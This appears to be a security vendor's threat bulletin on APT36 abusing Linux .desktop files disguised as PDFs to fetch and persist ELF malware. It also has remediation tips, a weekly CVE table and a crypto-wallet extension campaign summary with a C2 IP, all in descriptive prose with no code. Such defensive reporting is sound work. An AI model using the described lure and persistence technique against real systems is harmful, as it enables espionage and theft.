APT36 hackers abuse Linux .desktop files to install malware in new attacks
APT36 hackers abuse Linux .desktop files to install malware in new attacks
APT36 hackers abuse Linux .desktop files to install malware in new attacks CVSS : 8.2- 8.6 High
Information
APT36, also known as Transparent Tribe, is a hacker group from Pakistan that has modernized its cyber attack capabilities and focuses specifically on Linux systems, particularly BOSS Linux an operating system used by the Indian government in critical institutions such as security agencies and various ministries. APT36 often exploits zero-day vulnerabilities or uses lesser-known deception techniques to evade detection and maintain long-term access to their target systems. Recently, reports have indicated that the group has been using .desktop files on Linux to carry out attacks and spread malware within Indian security organizations. This marks a shift in their attack strategy from targeting Windows systems to Linux, in order to expand their reach and increase their chances of success.
Incident
In 2025, the hacker group APT36, a cyber espionage group from Pakistan, exploited .desktop files on the Linux operating system to spread malware and infiltrate targets within the Indian government and security organizations. They used phishing emails containing ZIP files, which included .desktop files disguised as PDF documents to trick users into double-clicking them.When the file is opened, hidden commands inside the .desktop file instruct the system to download and execute malware in the form of an ELF file. This technique allows the malware to stealthily embed itself into the system and configure the .desktop file to run automatically every time the user logs into the machine. This enables the malware to persist on the system for an extended period.Additionally, the malware communicates with a command-and-control server via WebSocket to exfiltrate data and receive commands from the attackers.
Remediation Steps
- Avoid opening .desktop files from untrusted sources.
- Configure permissions to prevent unverified .desktop files from being executable immediately.
- Limit user privileges.
- Keep the system and software updated to the latest versions.
The important things is Security systems. We must concern and monitor as usual.
For more information please contact
Email :sales@inetms.co.th
065 149 2822 (Ms.Suphatson )
063 204 4534 (Ms.Atsamaphorn)
065 929 6330 (Ms.Kansinee)
061 387 9439 (Ms.Sirilak)
092 257 6902 (Ms.Narusorn)
063 197 7510 (Mr.Yanotai)
065 725 7405 (Ms.Chanuntida)
065 725 7405 (Ms.Nattharini)
Reference
Weekly Interesting CVE
| NO. |
CVE Name |
Published Date |
Last Update |
Device/Appplication/OS Target |
Attack Type |
CVSS |
Detail |
Solution |
Reference |
|---|---|---|---|---|---|---|---|---|---|
| 1 |
CVE-2025-25256 |
12/8/2025 |
16/8/2025 |
Fortisiem |
Remote Code Execution (RCE) |
9.8 |
An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiSIEM version 7.3.0 through 7.3.1, 7.2.0 through 7.2.5, 7.1.0 through 7.1.7, 7.0.0 through 7.0.3 and before 6.7.9 allows an unauthenticated attacker to execute unauthorized code or commands via crafted CLI requests. |
update FortiSIEM |
|
| 2 |
CVE-2025-53779 |
12/8/2025 |
15/8/2025 |
Windows Kerberos |
Elevation of Privilege - EoP |
7.2 |
Relative path traversal in Windows Kerberos allows an authorized attacker to elevate privileges over a network. |
Install the security updates from Microsoft, which are part of the August 2025 Patch Tuesday |
|
| 3 |
CVE-2025-54948 |
5/8/2025 |
13/8/2025 |
Trendmicro |
Remote Code Execution (RCE) |
9.4 |
A vulnerability in Trend Micro Apex One (on-premise) management console could allow a pre-authenticated remote attacker to upload malicious code and execute commands on affected installations. |
Trend Micro Apex One users must immediately install the patches and hotfixes released by the company. |
https://app.opencve.io/cve/CVE-2025-54948
|
| 4 |
CVE-2025-47206 |
18/8/2025 |
18/8/2025 |
File Station 5 |
out-of-bounds write |
7.1 |
An out-of-bounds write vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to modify or corrupt memory. |
We have already fixed the vulnerability in the following version: File Station 5 5.5.6.4933 and later |
|
| 5 |
CVE-2025-8088 |
8/8/2025 |
15/8/2025 |
Windows version of WinRAR |
Code Execution (CE) |
8.4 |
A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. |
This issue fixed vulnerability in version 7.12 |
https://app.opencve.io/cve/CVE-2025-8088 |
Malware News or Campaign IOC/IOA | EN
|
No |
Campaign Name |
Detection Date |
Attack Type |
Description |
Mitigation/Remediation |
|---|---|---|---|---|---|
| 1 |
Bogus Firefox crypto wallet extensions pilfer more than $1M |
11/08/2025 |
Extension Hollowing |
A sophisticated and large-scale cybercrime campaign, named GreedyBear, has been exposed for stealing at least a million dollars from cryptocurrency users. The research, carried out by cybersecurity firm Koi Security. One of the main ways GreedyBear operates is through malicious browser extensions. The group has created over 150 fake extensions for the Firefox marketplace, pretending to be popular crypto wallets like MetaMask. A key detail Koi Security’s research has revealed is that all of these attacks, the fake extensions, the malware, and the scam websites, are all connected to a single central server (185.208.156.66). This central hub allows the attackers to manage their large-scale operation with great efficiency. |
|
Ref:https://www.scworld.com/brief/bogus-firefox-crypto-wallet-extensions-pilfer-more-than-1m
26 August 2025
Viewed 155 time
